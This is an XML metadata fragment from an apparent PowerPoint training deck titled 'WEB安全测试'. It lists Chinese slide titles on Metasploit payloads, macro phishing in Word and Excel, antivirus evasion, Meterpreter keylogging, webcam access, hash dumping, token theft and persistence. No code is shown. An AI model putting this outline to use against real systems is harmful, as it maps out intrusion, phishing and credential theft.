      <vt:lpstr>payload的可持续化建立(03靶机) svchost进程污染 进程迁移</vt:lpstr>
      <vt:lpstr>各平台payload生成</vt:lpstr>
      <vt:lpstr>生成脚本payload</vt:lpstr>
      <vt:lpstr>生成脚本payload</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>生成脚本payload</vt:lpstr>
      <vt:lpstr>侦听Handlers</vt:lpstr>
      <vt:lpstr>Powershell 配合msf无文件攻击  内存加载远程代码执行</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Powershell配合word(13版)伪装木马执行</vt:lpstr>
      <vt:lpstr>msf使用宏钓鱼思路:</vt:lpstr>
      <vt:lpstr>msf使用宏钓鱼</vt:lpstr>
      <vt:lpstr>msf宏钓鱼</vt:lpstr>
      <vt:lpstr>msf制作excel钓鱼</vt:lpstr>
      <vt:lpstr>制作钓鱼 </vt:lpstr>
      <vt:lpstr>如何让已经攻击成功的服务器连接内网的kali？</vt:lpstr>
      <vt:lpstr>如何让已经攻击成功的服务器连接内网的kali？</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>使用ngrok穿透内网</vt:lpstr>
      <vt:lpstr>Msf5-Evasion模块免杀</vt:lpstr>
      <vt:lpstr>Msf5-Evasion模块免杀  如果是之前的10版本(ok)</vt:lpstr>
      <vt:lpstr>捆绑免杀</vt:lpstr>
      <vt:lpstr>Shellter(收费版很强)免杀  win32 PE程序(才能注入)</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>免杀msfpayload</vt:lpstr>
      <vt:lpstr>免杀msfpayload</vt:lpstr>
      <vt:lpstr>免杀msfpaylaod</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>免杀上线</vt:lpstr>
      <vt:lpstr>venom免杀paylaod</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>什么是Meterpreter</vt:lpstr>
      <vt:lpstr>基本命令</vt:lpstr>
      <vt:lpstr>基本操作命令 大部分linux命令都能够使用</vt:lpstr>
      <vt:lpstr>基本操作命令</vt:lpstr>
      <vt:lpstr>基本命令</vt:lpstr>
      <vt:lpstr>摄像头命令</vt:lpstr>
      <vt:lpstr>端口转发 用的比较多、服务器在内网</vt:lpstr>
      <vt:lpstr>shell网络环境   进入内网</vt:lpstr>
      <vt:lpstr>键盘记录</vt:lpstr>
      <vt:lpstr>Hash获取</vt:lpstr>
      <vt:lpstr>抓包嗅探</vt:lpstr>
      <vt:lpstr>盗取令牌 用户身份</vt:lpstr>
      <vt:lpstr>持久控制服务器  用cs的较多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WEB安全测试</dc:title>
  <dc:creator>admin</dc:creator>
  <cp:lastModifiedBy>Pio</cp:lastModifiedBy>
  <cp:revision>751</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-23T15:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-08-22T13:40:43Z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